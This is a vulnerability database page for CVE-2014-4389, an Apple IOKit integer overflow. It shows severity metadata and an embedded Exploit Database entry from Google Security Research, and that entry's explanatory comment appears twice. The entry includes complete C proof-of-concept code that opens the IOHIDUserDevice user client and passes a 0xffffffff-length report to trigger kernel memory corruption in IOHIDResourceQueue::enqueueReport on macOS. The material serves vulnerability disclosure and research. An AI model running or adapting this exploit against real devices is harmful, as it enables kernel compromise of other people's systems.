CVE-2014-4389 Detail

CVE-2014-4389

EPSS

0.43%V3

Vector

Network

Published

2014-09-18
08h00 +00:00

Modified

2017-08-28
10h57 +00:00

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CVE.org

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CVE Descriptions

Integer overflow in IOKit in Apple iOS before 8 and Apple TV before 7 allows attackers to execute arbitrary code in a privileged context via an application that provides crafted API arguments.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-189	Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	9.3		AV:N/AC:M/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 45651

Publication date : 2018-10-21 22h00 +00:00
Author : Google Security Research
EDB Verified : Yes

/* IOHIDResourceQueue inherits from IOSharedDataQueue and adds its own ::enqueueReport method, which seems to be mostly copy-pasted from IOSharedDataQueue and IODataQueue's ::enqueue methods. I reported a bunch of integer overflows in IODataQueue over four years ago (CVE-2014-4389, apple issue 607452866) IOHIDResourceQueue::enqueueReport has basically the same bug: Boolean IOHIDResourceQueue::enqueueReport(IOHIDResourceDataQueueHeader * header, IOMemoryDescriptor * report) { UInt32 headerSize = sizeof(IOHIDResourceDataQueueHeader); UInt32 reportSize = report ? (UInt32)report->getLength() : 0; UInt32 dataSize = ALIGNED_DATA_SIZE(headerSize + reportSize, sizeof(uint32_t)); <--- (a) UInt32 head; UInt32 tail; UInt32 newTail; const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE; IODataQueueEntry * entry; // Force a single read of head and tail head = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->head, __ATOMIC_RELAXED); tail = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->tail, __ATOMIC_RELAXED); if ( tail > getQueueSize() || head > getQueueSize() || dataSize < headerSize || entrySize < dataSize) <--- (b) { return false; } if ( tail >= head ) { // Is there enough room at the end for the entry? if ((getQueueSize() - tail) >= entrySize ) { entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail); entry->size = dataSize; bcopy(header, &entry->data, headerSize); if ( report ) report->readBytes(0, ((UInt8*)&entry->data) + headerSize, reportSize); <--- (c) Report is the IOMemoryDescriptor which wraps the stucture input to the io_connect_call, it's wrapping a portion of userspace so we can actually make an IOMemoryDescriptor with a length of 0xffffffff. This will overflow at (a) giving us a small value for dataSize. This will pass the checks at (b) but then the reportSize value is used at (c) for the actually memory write operation. The IOHIDResource is used when userspace wants to implement an HID device; to exploit this you need there to actually be one of these devices. If you have the com.apple.hid.manager.user-access-device entitlement you can create one of these. A bunch of daemons do possess this entitlement, for example bluetoothd needs it to implement bluetooth HID keyboards, so if you have a bluetooth keyboard connected you can trigger this bug without needing com.apple.hid.manager.user-access-device.) You can test this PoC either by connecting a bluetooth HID device, or by building the IOHIDResource keyboard example from the IOHIDFamily code, giving it the correct entitlement and running it. */ // @i41nbeer /* iOS/MacOS kernel memory corruption due to integer overflow in IOHIDResourceQueue::enqueueReport IOHIDResourceQueue inherits from IOSharedDataQueue and adds its own ::enqueueReport method, which seems to be mostly copy-pasted from IOSharedDataQueue and IODataQueue's ::enqueue methods. I reported a bunch of integer overflows in IODataQueue over four years ago (CVE-2014-4389, apple issue 607452866) IOHIDResourceQueue::enqueueReport has basically the same bug: Boolean IOHIDResourceQueue::enqueueReport(IOHIDResourceDataQueueHeader * header, IOMemoryDescriptor * report) { UInt32 headerSize = sizeof(IOHIDResourceDataQueueHeader); UInt32 reportSize = report ? (UInt32)report->getLength() : 0; UInt32 dataSize = ALIGNED_DATA_SIZE(headerSize + reportSize, sizeof(uint32_t)); <--- (a) UInt32 head; UInt32 tail; UInt32 newTail; const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE; IODataQueueEntry * entry; // Force a single read of head and tail head = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->head, __ATOMIC_RELAXED); tail = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->tail, __ATOMIC_RELAXED); if ( tail > getQueueSize() || head > getQueueSize() || dataSize < headerSize || entrySize < dataSize) <--- (b) { return false; } if ( tail >= head ) { // Is there enough room at the end for the entry? if ((getQueueSize() - tail) >= entrySize ) { entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail); entry->size = dataSize; bcopy(header, &entry->data, headerSize); if ( report ) report->readBytes(0, ((UInt8*)&entry->data) + headerSize, reportSize); <--- (c) Report is the IOMemoryDescriptor which wraps the stucture input to the io_connect_call, it's wrapping a portion of userspace so we can actually make an IOMemoryDescriptor with a length of 0xffffffff. This will overflow at (a) giving us a small value for dataSize. This will pass the checks at (b) but then the reportSize value is used at (c) for the actually memory write operation. The IOHIDResource is used when userspace wants to implement an HID device; to exploit this you need there to actually be one of these devices. If you have the com.apple.hid.manager.user-access-device entitlement you can create one of these. A bunch of daemons do possess this entitlement, for example bluetoothd needs it to implement bluetooth HID keyboards, so if you have a bluetooth keyboard connected you can trigger this bug without needing com.apple.hid.manager.user-access-device.) You can test this PoC either by connecting a bluetooth HID device, or by building the IOHIDResource keyboard example from the IOHIDFamily code, giving it the correct entitlement and running it. Tested on MacOS 10.13.6 (17G65) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <IOKit/IOKitLib.h> #include <mach/mach.h> #include <mach/mach_vm.h> int main(int argc, char** argv){ printf("pid: %d\n", getpid()); kern_return_t err; io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOHIDUserDevice")); if (service == IO_OBJECT_NULL){ printf("unable to find service\n"); return 0; } io_connect_t conn = MACH_PORT_NULL; err = IOServiceOpen(service, mach_task_self(), 0, &conn); if (err != KERN_SUCCESS){ printf("unable to get user client connection\n"); return 0; } printf("got client\n"); uint64_t inputScalar[16]; uint64_t inputScalarCnt = 0; char inputStruct[4096]; size_t inputStructCnt = 0; uint64_t outputScalar[16]; uint32_t outputScalarCnt = 0; char outputStruct[4096]; size_t outputStructCnt = 0; // open inputScalar[0] = 0; inputScalarCnt = 1; err = IOConnectCallMethod( conn, 1, inputScalar, inputScalarCnt, inputStruct, inputStructCnt, outputScalar, &outputScalarCnt, outputStruct, &outputStructCnt); if (err != KERN_SUCCESS){ printf("IOConnectCall error: %x\n", err); return 0; } printf("called external method open\n"); mach_vm_address_t addr = 0x4100000000; mach_vm_size_t size = 0x1000; err = IOConnectMapMemory(conn, 0, mach_task_self(), &addr, &size, 0); if (err != KERN_SUCCESS){ printf("IOConnectMapMemory failed:0x%x\n", err); return 0; } printf("mapped queue memory here: %016llx\n", addr); char* buf = malloc(0x100000000); memset(buf, 'A', 0x100000000); inputScalar[0] = 0x0; inputScalar[1] = 0x0; inputScalarCnt = 3; outputScalarCnt = 0; err = IOConnectCallMethod( conn, 13, // setreport inputScalar, inputScalarCnt, buf, 0xffffffff, outputScalar, &outputScalarCnt, outputStruct, &outputStructCnt); if (err != KERN_SUCCESS){ printf("IOConnectCall error: %x\n", err); return 0; } return 0; }